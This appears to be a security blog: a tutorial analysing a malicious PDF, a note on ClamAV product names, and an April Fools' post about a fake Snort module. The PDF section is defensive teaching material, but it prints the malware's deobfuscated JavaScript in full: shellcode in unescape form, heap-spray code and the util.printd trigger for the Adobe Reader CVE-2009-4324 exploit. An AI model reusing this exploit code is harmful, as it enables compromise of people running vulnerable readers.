[objnum] [genid] obj (value) endobj

Obj tags declare what sort of data is in this section of the file. They should be pretty straight forward:
4 0 obj << /Length 5 0 R /Filter /FlateDecode >> stream (Ton of data...) endstream endobj 5 0 obj 185 endobj

The first object above is object number 4 with a genid of 0. Note that the combination of the object number and gen id are a unique identifier within the PDF spec. While I haven't seen an example with multiple objnums and genids, I wouldn't put it past someone to give it a shot. Inside the << >> is a definition of what it is that this object holds. The object in question is a FlateDecoded stream. It also has a relative reference that you have to understand. The “/Length” field declares the length of the stream data. In this case, that value is contained in object number 5. We know this because of the “ R” structure immediately following the “/Length” tag.
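As a quick illustration of how that reference gets resolved, here is a minimal Python sketch that pulls the objects out of the sample above and looks up the stream length. It is a regex-based toy, assuming well-behaved input: a real parser has to cope with stream data that happens to contain "endobj", cross-reference tables and so on. The function names are made up for this example.

```python
import re

OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)endobj", re.S)
LENGTH_REF_RE = re.compile(rb"/Length\s+(\d+)\s+(\d+)\s+R")
LENGTH_DIRECT_RE = re.compile(rb"/Length\s+(\d+)")


def parse_objects(pdf_bytes):
    """Map (objnum, genid) -> raw object body."""
    return {(int(n), int(g)): body.strip() for n, g, body in OBJ_RE.findall(pdf_bytes)}


def stream_length(objects, key):
    body = objects[key]
    ref = LENGTH_REF_RE.search(body)
    if ref:
        # "/Length 5 0 R": the value lives in another object, so go fetch it.
        target = (int(ref.group(1)), int(ref.group(2)))
        return int(objects[target])
    direct = LENGTH_DIRECT_RE.search(body)
    return int(direct.group(1)) if direct else None


sample = (b"4 0 obj << /Length 5 0 R /Filter /FlateDecode >> "
          b"stream (Ton of data...) endstream endobj 5 0 obj 185 endobj")
objects = parse_objects(sample)
print(stream_length(objects, (4, 0)))
```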

This seems simple, but Adobe has to support extended characters for the various languages around the world. To support this, they provided the option to ASCII hex encode fields within the PDF document. This is done by placing the ASCII hexadecimal value for the character you are representing immediately after a “#” character. So the letter “A” can be represented as #41.

Attackers use this feature to obscure names so that you can’t look specifically for object tags like JBIG2 or JavaScript. So the following object string:

/Type/Action/S/JavaScript/JS 6 0 R

Could be represented as:

/Typ#65/#41#63t#69#6fn/S/#4a#61#76a#53cript/J#53 6 0 R
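Undoing this encoding is simple enough to sketch in a couple of lines of Python. This is not Didier Stevens' tool, just a bare-bones illustration; decode_pdf_names is a made-up helper, and it naively rewrites every #XX sequence in the text it is given, so it should only be pointed at the dictionary portion of an object and not at stream data.

```python
import re


def decode_pdf_names(text):
    """Replace each #XX sequence with the character it encodes."""
    return re.sub(r"#([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), text)


obfuscated = "/Typ#65/#41#63t#69#6fn/S/#4a#61#76a#53cript/J#53 6 0 R"
decoded = decode_pdf_names(obfuscated)
print(decoded)  # /Type/Action/S/JavaScript/JS 6 0 R
```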

You can use Didier Stevens’ script to deobfuscate object tags with ASCII hex encoding. So the file we’re looking at has the following deobfuscated lines:

(obj 1) /Type/Catalog/Outlines 2 0 R/Pages 3 0 R/OpenAction 5 0 R
(obj 2) /Type/Outlines/Count 0
(obj 3) /Type/Pages/Kids[4 0 R]/Count 1
(obj 4) /Type/Page/Parent 3 0 R/MediaBox[0 0 612 792]
(obj 5) /Type/Action/S/JavaScript/JS 6 0 R
(obj 6) /Length 2008/Filter[/FlateDecode/ASCIIHexDecode]

Besides the obfuscation, the OpenAction->JavaScript->FlateDecode sequence should immediately concern you.  The OpenAction declaration in the object tag means that the associated data should be executed as soon as the document is opened.  In this case it is a relative reference to object 5.  Object 5 in turn declares the data as JavaScript and points to object 6.  Object 6 is a deflated stream of data, which gives us a new obstacle to deal with.
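
To make the chain concrete, here is a small Python sketch that walks it using the deobfuscated lines listed above. OBJECTS, follow and open_action_chain are names I made up for the illustration, and the code assumes the dictionaries have already been deobfuscated into plain strings.

```python
import re

# Deobfuscated dictionaries from the listing above, keyed by object number.
OBJECTS = {
    1: "/Type/Catalog/Outlines 2 0 R/Pages 3 0 R/OpenAction 5 0 R",
    2: "/Type/Outlines/Count 0",
    3: "/Type/Pages/Kids[4 0 R]/Count 1",
    4: "/Type/Page/Parent 3 0 R/MediaBox[0 0 612 792]",
    5: "/Type/Action/S/JavaScript/JS 6 0 R",
    6: "/Length 2008/Filter[/FlateDecode/ASCIIHexDecode]",
}


def follow(objects, objnum, key):
    """Return the object number that `key` references inside object `objnum`, or None."""
    m = re.search(re.escape(key) + r"\s+(\d+)\s+\d+\s+R\b", objects[objnum])
    return int(m.group(1)) if m else None


def open_action_chain(objects):
    """Walk /OpenAction -> JavaScript action -> /JS and list the objects visited."""
    for num in objects:
        action = follow(objects, num, "/OpenAction")
        if action is None:
            continue
        chain = [num, action]
        if re.search(r"/S\s*/JavaScript", objects.get(action, "")):
            script = follow(objects, action, "/JS")
            if script is not None:
                chain.append(script)
        return chain
    return []


print(open_action_chain(OBJECTS))  # [1, 5, 6]
```

A chain that ends at a filtered stream, as this one does at object 6, is the pattern worth flagging for a closer look.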

So object 6 looks like this:
00000190  3E 65 6E 64 6F 62 6A 0D 0A 36 20 30 20 6F 62 6A >endobj..6 0 obj
000001A0  3C 3C 2F 4C 23 36 35 6E 23 36 37 23 37 34 68 20 <</L#65n#67#74h 
000001B0  32 30 30 38 2F 23 34 36 69 6C 23 37 34 65 23 37 2008/#46il#74e#7
000001C0  32 5B 2F 23 34 36 6C 23 36 31 74 65 44 23 36 35 2[/#46l#61teD#65
000001D0  63 23 36 66 64 65 2F 23 34 31 53 23 34 33 23 34 c#6fde/#41S#43#4
000001E0  39 23 34 39 23 34 38 65 23 37 38 23 34 34 23 36 9#49#48e#78#44#6
000001F0  35 23 36 33 23 36 66 23 36 34 23 36 35 5D 3E 3E 5#63#6f#64#65]>>
00000200  0D 0A 73 74 72 65 61 6D 0D 0A 78 9C 7D 59 6D 92 ..stream..x.}Ym.
00000210  EB 36 0C BB 8A 8E 60 EB D3 FE D3 BB 64 B3 DB FB .6....`.....d...
00000220  1F A1 24 01 52 92 93 E9 4C 37 4D 64 89 22 41 10 ..$.R...L7Md."A.
00000230  94 F5 8E 57 1A 3D F5 33 8D 9C 52 CA 87 7C D4 7F ...W.=.3..R..|..
00000240  E5 A3 BF E5 CB 4B BE B4 91 9A 3C EA FA 57 75 6E .....K....<..Wun
00000250  C2 47 6F FA 4D 3F 64 B1 4D 4B FD 4E AD CA B2 92 .Go.M?d.MK.N....
00000260  FA 0B 13 C6 0D 2B 3A 3C C4 76 BF 6C 48 0D A6 21 .....+:<.v.lH..!

Using Didier Stevens’ pdf-parser, we can get an inflated view of object 6 by using the following arguments:
[kpyke@segfault]$./ -o6 -f bad.pdf
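
If you would rather see what the tool is doing under the hood, the filter chain on object 6 can be undone with a few lines of Python. This is only a sketch under some assumptions: decode_stream is a name I made up, it handles just the two filters named in object 6, and it assumes you have already carved the raw bytes between "stream" and "endstream" out of the file. Filters are applied in the order they are listed, so the data is inflated first and hex decoded second.

```python
import binascii
import zlib


def decode_stream(raw, filters):
    """Apply PDF stream filters in the order they are listed in /Filter."""
    data = raw
    for name in filters:
        if name == "FlateDecode":
            data = zlib.decompress(data)
        elif name == "ASCIIHexDecode":
            # Hex digits with optional whitespace; ">" marks the end of the data.
            hex_text = b"".join(data.split(b">", 1)[0].split())
            if len(hex_text) % 2:
                hex_text += b"0"  # an odd final digit is padded with 0
            data = binascii.unhexlify(hex_text)
        else:
            raise ValueError("filter not handled in this sketch: " + name)
    return data


# Round-trip check with harmless stand-in data (not the sample from this post).
original = b"var x = 1;"
encoded = zlib.compress(binascii.hexlify(original) + b">")
print(decode_stream(encoded, ["FlateDecode", "ASCIIHexDecode"]))
```

The 78 9C at the start of the stream in the hex dump is a typical zlib header, which is a quick sanity check that FlateDecode really is the first filter to undo.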

Let’s take the output one block at a time.  Looking at this, your first thought is probably "What the hell is with that variable name?".  This is a common JavaScript obfuscation technique.  By randomizing the variable names, it is difficult for IDS/AV systems to target them with set signatures.  It is definitely a sign that this file is jacked.

The first variable puts the shellcode into memory:

var OlJWRbdvveuaWiTCjeyJTphyRwPgnwjlnPwhiTXRqYmV = unescape("%uc931%u89bf%ucf5a%ub1ac%udb48%ud9ca%u2474%u5af4%uea83%u31fc%u0d7a%u7a03%ue20d%ua67c%u2527%u577e%u56b8%ub2f7%u4489%ub663%u58b8%u9ae0%u1230%u0ea4%u56c2%u2060%udc63%u0f56%ud074%uc356%u72b6%u1e2a%u54eb%ud113%u95fe%u0c54%uc4f0%u5a0d%uf8a3%u1e3a%uf878%u14ec%u82c0%ueb89%u38b5%u3b90%u3665%ua3da%u100d%ud2fa%u42c2%u9dc6%ub06f%u1fbd%u88a6%u2e3e%u4786%u9e01%u990b%u1946%uecf4%u59bc%uf689%u2307%u7255%u8395%u241e%u357d%ub3f2%u39f6%ub0bf%u5e50%u143e%u5aeb%u9bcb%ueb3b%ubf8f%ub79f%ua154%u1d86%ude3a%ufad8%u7ae3%ue993%ufdf0%u67fe%u8f06%uc185%u8f08%u6185%ube61%uee0e%u3ff6%u4ac5%u0a08%ufa47%ud381%ube12%ue3cf%ufdc9%u67e9%u7dfb%u770e%u788e%u3f4a%uf163%uaac3%ua683%ufee4%u25e0%u2f7f%ucd83%u0f1a%u4d64%u21c5%ue51f%ucb25%u60ac%u1354%u0e3f%u32ec%ua0cc%uda60%u355b%u4959%uc1fe%ue2f8%u4670%u6d94%ub604%u2f45%uf2a0%u89b9%udb0e%ub0d7%u3b3a%u5444%u5aa1%ucdf8%uf257%u6275%u4db7%uef12%u23de%u9cb3%uce54%u1722%u5cfb%uf7d6%uc46e%u996c%u7603%u36e1%u028a%ue7d9%uaf0d%uf85d");
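
When you want to hand a blob like this to a disassembler, you first need the raw bytes. Here is a minimal Python sketch, with unescape_u being a made-up name for this example. It assumes the string contains only %uXXXX escapes and that each 16-bit value lands in memory little-endian, as it does on x86.

```python
import re


def unescape_u(text):
    """Convert %uXXXX escapes to the bytes they occupy in memory (little-endian)."""
    out = bytearray()
    for hexword in re.findall(r"%u([0-9A-Fa-f]{4})", text):
        out += int(hexword, 16).to_bytes(2, "little")
    return bytes(out)


# First two escapes from the variable above.
print(unescape_u("%uc931%u89bf").hex())  # 31c9bf89
```

Note the byte swap: "%uc931" becomes 31 c9, not c9 31, which is easy to get wrong when eyeballing the string.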

The second block of code sets up the heap spray:
var WmBcOiflJCZIlBHlQMYvLqUsYVqUOiZajvemAdT = unescape("%u41b1%u483f");
while(WmBcOiflJCZIlBHlQMYvLqUsYVqUOiZajvemAdT.length >= 32768) WmBcOiflJCZIlBHlQMYvLqUsYVqUOiZajvemAdT+=WmBcOiflJCZIlBHlQMYvLqUsYVqUOiZajvemAdT;WmBcOiflJCZIlBHlQMYvLqUsYVqUOiZajvemAdT=WmBcOiflJCZIlBHlQMYvLqUsYVqUOiZajvemAdT.substring(0,32768 - OlJWRbdvveuaWiTCjeyJTphyRwPgnwjlnPwhiTXRqYmV.length);
memory=new Array();

for(i=0;i<0x2000;i++) {
     memory[i]= WmBcOiflJCZIlBHlQMYvLqUsYVqUOiZajvemAdT + OlJWRbdvveuaWiTCjeyJTphyRwPgnwjlnPwhiTXRqYmV;

The final block is the vulnerability triggering condition.  In this case, it is an exploit of the media.newPlayer vulnerability in Adobe Reader (CVE-2009-4324):
util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
try {;} catch(e) {}
util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());

So to recap, important things to know about PDFs, just to get started:
  1.  ASCII hex encoding, particularly alternating between non-encoded and encoded characters, should raise red flags.
  2.  The OpenAction tag should get your attention, but it does exist in valid documents.
  3.  You need to get out there and check out JavaScript obfuscation, although you should certainly be able to just point to the block and go "I don't know what the hell that is, but it ain't right".
  4.  In particular, look for the following JS obfuscation keywords:
    • unescape
    • syncAnnotScan
    • getAnnots
    • replace
  5.  Also look for the following JS obfuscation techniques:
    • Renaming functions and then calling the new name
    • Providing blocks of ASCII hex encoded data separated by a single character, replacing that character with a "%", and then passing the resulting block to unescape.
    • Randomized variable strings
  6.  Items 4 and 5 aren't even close to an exhaustive list.
  7.  Track the work of Didier Stevens.
  8.  Most of the bad stuff you'll see will look wrong right out of the box. Trust your instincts.
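
A few of the checks in this list are easy to automate as a first pass. The Python sketch below is only that, a first pass: triage, normalize_names and the flag strings are all made up for this example, and the JS keywords will only be visible if the script stream is not compressed (or has already been decoded). Treat a hit as a reason to look closer, not as a verdict.

```python
import re

# A name containing at least one #xx escape, e.g. /Typ#65
HEX_NAME = re.compile(rb"/[A-Za-z]*#[0-9A-Fa-f]{2}")
JS_KEYWORDS = (b"unescape", b"syncAnnotScan", b"getAnnots", b"replace")


def normalize_names(data):
    """Undo #xx escapes so obfuscated names can be matched as plain text."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)


def triage(data):
    """Return a list of red flags found in raw PDF bytes."""
    flags = []
    if HEX_NAME.search(data):
        flags.append("hex-encoded name")
    plain = normalize_names(data)
    if b"/OpenAction" in plain:
        flags.append("OpenAction")
    if b"/JavaScript" in plain or b"/JS" in plain:
        flags.append("JavaScript")
    for keyword in JS_KEYWORDS:
        if keyword in plain:
            flags.append("JS keyword: " + keyword.decode())
    return flags


sample = (b"1 0 obj<</Typ#65/Catalog/Open#41ction 5 0 R>>endobj "
          b"5 0 obj<</S/#4a#61#76a#53cript/J#53 6 0 R>>endobj")
print(triage(sample))  # ['hex-encoded name', 'OpenAction', 'JavaScript']
```

Since OpenAction does show up in valid documents, the combination of flags matters more than any single one.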

Thursday, April 1, 2010

What in the name!...

If you are confused by the naming of ClamAV products, here's a quick breakdown:
  • ClamAV®: open source (GPL) anti-virus toolkit for UNIX, designed especially for e-mail scanning on mail gateways. Available here.
  • ClamAV® (Win32 binaries): Win32 port of ClamAV. Available here.
  • ClamAV® for Windows: Microsoft® Windows-specific Anti-Virus (AV) solution using an advanced Cloud-based protection mechanism. Developed in partnership with Immunet Corporation. Available here.
The products listed above are the only ones developed and maintained by Sourcefire® Inc.

New Mac OSX Module for Snort

Today, the VRT is excited to announce a revolutionary new module for the Snort Intrusion Detection System.  The extraordinary capability of Snort to be molded through rules, so_rules, preprocessors and the fact that the entire code base is open gives us unprecedented capability to bring to our customers what they truly need.  That is why the VRT has been working hard for the past two months to deliver this new functionality.  We hope you enjoy it as much as we will enjoy not working on it anymore.

So, what is this new module?  Well first, let me set the scene.  Businesses that have OSX as their primary systems live in a security Nirvana.  Without exploits, viruses or rootkits to worry about, their security guys are much like the Maytag repairman.  Lots of time with their feet up, checking their brackets, developing the ultimate waste-paper basketball techniques and generally living life as only they can.  But we know and you know that they have to have systems going to make it look like they are working. So, in addition to the empty boxes that just have blinking LEDs on them, they also have firewalls, AV, IDS and other systems that they can look at intently when their bosses come over.

Now those of you with Windows systems are probably jealous that the Mac guys are getting yet another shiny toy.  But don't worry, since Snort is Open Source, you can always just stand up a box and call that network your "Mac" network.  You're golden.

Now, there are three variants of the new Mac OSX module.  The first is the Snort SETI plugin.  This will allow you to take all of those CPU cycles that you're spending not detecting attacks on Mac OSX systems and put them to use finding aliens.  We can't be wasting cycles in this day and age.  Also, we can't let these CPUs contribute to global warming; that's not cool (get it?).  Finally, the faster we find these aliens, the sooner we'll have our Elvis back.

The second module is a Systems Simulation and Exploitation Center.  This module will allow any of the systems running Snort to act as one of several pre-configured operating systems and applications.  Then, using a special client, you can execute a variety of "attacks" on the system.  The intended use of this is not to attract a mate, although I think we can all agree that there is nothing sexier than popping a shell.  Instead, it is meant to be used on patch days.

Invariably the following conversation occurs:

"Hey, um, systems guy, there is a huge patch out.  We have to stay late tonight, incur some downtime and patch the servers."

Systems guy stares at security guy.  Both of them are bathed in the noon-day fluorescent light of the server room.  A single bead of sweat travels down the face of security guy.  Systems guy hasn't moved.  His eyebrow twitches, and the corner of his mouth pulls up in what he thinks is a smile.

"Prove it".

Security guy fakes being concerned briefly, argues with the systems guy and finally storms out.  He spends the next hour in the office watching Glee re-runs and then storms out.  He drags the systems guy into the "lab" and then fires up his special, VRT-supplied client app.  He types furiously while ancient arcane symbols float around the screen.  Briefly the systems guy thinks he sees a picture of his mother, but it happens too fast for him to be sure.

Finally, triumphantly, security guy points to the screen.  A beautiful, fully interactive shell sits ready.  With a little extra configuration, you can make it look just like his desktop.  This is the beauty of the SSEC system.  When patch day comes, no one will stand in your way, because you are the supreme blackhat.

The final module is a favorite of the VRT and we'll be honest, it has little value for you, but it will make us super-duper happy.  The terminal will display a happy series of events, every now and then flashing "APT BLOCKED!!!!" in big red letters.  Your boss will nod his head sagely, after all, he did sign the PO, and then tell you to take the rest of the day off.

Meanwhile, that sensor, along with every other sensor running our special "APT BLOCKED!!!" module, would constantly be fuzzing an application of our choice.  Indeed, each time you saw "APT BLOCKED!!!" it would actually be an indication that we had successfully crashed the application and had sent the information on the crash back to the VRT lair.  How could your soul NOT be warmed by the knowledge that we reside, happy in our den, because you have given over your sensor to the fuzzing gods?

Well there you have it folks.  We know you Mac folks don't need security systems, so let's not waste those CPU cycles!  Feel free to download the beta here.